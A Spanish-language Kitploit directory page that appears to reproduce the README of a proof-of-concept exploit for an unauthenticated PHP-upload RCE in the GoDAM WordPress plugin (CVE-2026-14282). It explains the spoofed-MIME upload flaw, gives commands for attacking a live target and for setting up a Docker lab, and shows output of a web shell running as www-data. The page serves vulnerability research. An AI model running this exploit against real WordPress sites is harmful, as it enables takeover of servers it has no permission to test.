Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2026-14282 — GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282) | Kitploit
Herramientas/GitHubGitHub/nullwhisper/cve-2026-14282
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingLabs & Practice
GitHubnullwhisper/cve-2026-14282

CVE-2026-14282

GoDAM WordPress plugin <= 1.12.2 unauthenticated file upload RCE (CVE-2026-14282)

Ver Repositorio
1hace 8 díasAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

CVE-2026-14282 — Plugin GoDAM para WordPress <= 1.12.2 Subida de archivos sin autenticar -> RCE

Autor: nullwhisper
Caso de uso: solo investigación de seguridad autorizada / validación de vulnerabilidades.

¿Qué es esto?

Las versiones <= 1.12.2 del plugin GoDAM para WordPress registran un campo de WPForms llamado godam_record. El gestor de subida save_video_file() está enganchado a la acción pública wpforms_process_before_filter, por lo que se ejecuta antes de cualquier comprobación de autenticación. El gestor confía en la cabecera Content-Type controlada por el atacante, acepta un archivo PHP siempre que el tipo MIME comience con video/, y lo mueve al directorio servido por web wp-content/uploads/godam/wpforms/. Esto permite a un atacante no autenticado subir y ejecutar código PHP arbitrario.

  • CVE: CVE-2026-14282
  • Producto: Plugin GoDAM para WordPress
  • Afectados: <= 1.12.2
  • Corregido: 2.0.0
  • Tipo: Subida arbitraria de archivos sin autenticar que conduce a RCE
  • CVSS: 9.8 (Crítico)

Referencias

  • Aviso de IONIX: https://www.ionix.io/threat-center/cve-2026-14282/
  • Registro CVE: https://www.cve.org/CVERecord?id=CVE-2026-14282
  • NVD: https://nvd.nist.gov/vuln/detail/CVE-2026-14282
  • Página del plugin en WordPress.org: https://wordpress.org/plugins/godam/

Archivos

root@kitploit:~
.
├── cve_2026_14282_poc.py   # PoC principal
├── lab/
│   ├── docker-compose.yml  # Laboratorio WordPress
│   └── setup.php           # Crea un formulario de WPForms con el campo GoDAM
├── requirements.txt
└── README.md

Instalación

root@kitploit:~
pip3 install -r requirements.txt

Uso

Objetivo en vivo

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form

El script detecta automáticamente el ID del formulario de WPForms y el ID del campo GoDAM. Si la página contiene varios formularios o la detección falla, use:

root@kitploit:~
python3 cve_2026_14282_poc.py -u https://target.com/page-with-form \
    --form-id 4 --field-id 1 --cmd "whoami"

Laboratorio local

  1. Descargue los plugins vulnerables (no redistribuya los binarios):

    root@kitploit:~
    mkdir -p lab/wpforms-lite lab/godam
    cd lab/wpforms-lite
    wget https://downloads.wordpress.org/plugin/wpforms-lite.latest-stable.zip
    unzip wpforms-lite.latest-stable.zip
    rm wpforms-lite.latest-stable.zip
    cd ../godam
    wget https://downloads.wordpress.org/plugin/godam.1.12.2.zip
    unzip godam.1.12.2.zip
    rm godam.1.12.2.zip
    cd ../..
    
  2. Inicie el laboratorio:

    root@kitploit:~
    cd lab
    docker compose up -d
    
  3. Complete el instalador de WordPress en http://127.0.0.1:8092.

  4. Instale y active los plugins, luego cree el formulario y la página de prueba:

    root@kitploit:~
    docker exec -i lab-wpcli-1 wp plugin activate wpforms-lite --allow-root
    docker exec -i lab-wpcli-1 wp plugin activate godam --allow-root
    docker exec -i lab-wpcli-1 php /tmp/setup.php
    
  5. Ejecute el PoC:

    root@kitploit:~
    python3 cve_2026_14282_poc.py -u 'http://127.0.0.1:8092/?page_id=7' --cmd 'echo PWNED'
    

Verificado en localhost

Probado en WordPress 6.8 + WPForms Lite última versión + GoDAM 1.12.2.

root@kitploit:~
[*] Detecting WPForms form and GoDAM field...
[*] Found form ID 4, GoDAM field(s): 1
[*] Trying upload via field 1...
[+] Shell uploaded and executed: http://127.0.0.1:8092/wp-content/uploads/godam/wpforms/godam-shell.php
[+] Output: GODAM-RCE-Linux ... uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Command output:
GODAM-RCE-Linux ... PWNED

Por qué no se incluyen los binarios de los plugins

Este repositorio contiene solo el PoC y los archivos de orquestación del laboratorio. Los binarios de los plugins vulnerables se excluyen para evitar aumentar el tamaño y problemas de distribución. Descargue las versiones vulnerables específicas desde WordPress.org para su propio laboratorio.

Aviso legal

Esta herramienta es solo para pruebas de seguridad autorizadas e investigación. No la use contra sistemas que no le pertenezcan o para los que no tenga permiso explícito de probar. El autor no es responsable del mal uso o de los daños causados por este código.

Descargar herramienta